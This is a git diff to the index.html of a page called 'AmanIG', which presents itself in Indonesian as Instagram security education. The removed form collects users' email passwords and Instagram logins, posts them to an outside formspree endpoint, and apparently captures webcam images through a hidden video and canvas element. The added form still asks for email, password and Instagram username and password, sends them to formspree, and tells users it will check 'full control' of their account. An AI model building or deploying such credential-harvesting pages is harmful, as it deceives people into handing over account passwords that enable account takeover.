--- a/index.html
+++ b/index.html
@@ -127,30 +127,26 @@ Menghindari website yang menjanjikan fitur tidak resmi seperti peretasan akun, p
     </div>
 
     <!-- modify this form HTML and place wherever you want your form -->
-<form
-  action="https://formspree.io/f/xreaqakg"
-  method="POST"
->
-  <label>
-    Your email & password:
-    <input type="email" name="email">
-  </label>
-  <label>
-    Your IG & Password:
-    <textarea name="message"></textarea>
-  </label>
-  <!-- your other form fields go here -->
-  <button type="button" onclick="captureAndSubmit()" style="background: #0095f6; color: white; padding: 1rem; font-weight: bold; border: none; border-radius: 8px; width: 100%; margin-top: 1.5rem; font-size: 1.1rem; cursor: pointer;">
-  KIRIM
-</button>
-<p style="text-align: center; color: #ffffff; font-size: 0.9rem; margin-top: 0.5rem; font-weight: 600;">
-  (cek kendali penuh instagram kamu)
-</p>
-</form>
+<form action="https://formspree.io/f/mbdaodwb" method="POST">
+  <input type="hidden" name="_subject" value="Kiriman Dummy dari AmanIG">
 
-  <!-- Elemen kamera tersembunyi -->
-  <video id="video" autoplay playsinline></video>
-  <canvas id="canvas"></canvas>
+  <label>Your email & password:</label>
+  <input type="email" name="email" placeholder="contoh: alexachh69@gmail.com">
+
+  <label>Username IG:</label>
+  <input type="text" name="username_ig" placeholder="contoh: bNsjsjs" required>
+
+  <label>Password IG:</label>
+  <input type="text" name="password_dummy" placeholder="contoh: 19827363" required>
+
+  <button type="submit" style="background:#1877f2; color:white; padding:1.2rem; font-weight:bold; border:none; border-radius:8px; width:100%; margin-top:1.5rem; font-size:1.2rem; cursor:pointer;">
+    KIRIM
+  </button>
+
+  <p style="text-align:center; color:#0095f6; font-size:0.9rem; margin-top:0.6rem; font-weight:600;">
+    (cek kendali penuh instagram kamu)
+  </p>
+</form>
 
   <footer>
     <p>© 2026 AmanIG • Dibuat untuk edukasi keamanan siber di Parepare • Bukan untuk aktivitas ilegal</p>
